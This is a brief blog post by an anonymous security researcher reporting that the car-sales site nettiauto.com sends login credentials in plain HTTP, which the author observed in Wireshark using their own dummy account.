A regular wednesday morning starts, but with a small inspiration from yesturday evening. Being a car enthusiastic the best place to check out the price and sale status of cars is probably the www.nettiauto.com page. After checking it around for a while I noticed this interesting “Login” button. Simultaneously noticing that we’re not using HTTPS. Well, of course one needs to know what could it be possible?
In general using HTTP for transmitting username and plain-text passwords from browser to web server is bad, bad design. Though we can argue that someone needs to listen for the traffic and it requires quite an effort. Yes it does, in some level. Man-in-the-Middle -attacks are pretty easy nowdays to do if attacker is just in the same network than the victim is.
At this point I would like to point out that this experiment was conducted on my personal machine only affecting me.
Back to the Nettiauto. After a little time and effort, in the Wireshark was displayed very tempting HTTP POST -message to /login.php. Please see the clip of a screenshot below.
If you did not yet guess, I used “testiuser” as username and “researcherpassword” as the password. The impact in this case for getting userID stolen is quite minimal, but very unfortunate however. Since we all are using different passwords for all the services, we dont have to worry if one web page can leaks our password, right?
Text by an anonymous information security researcher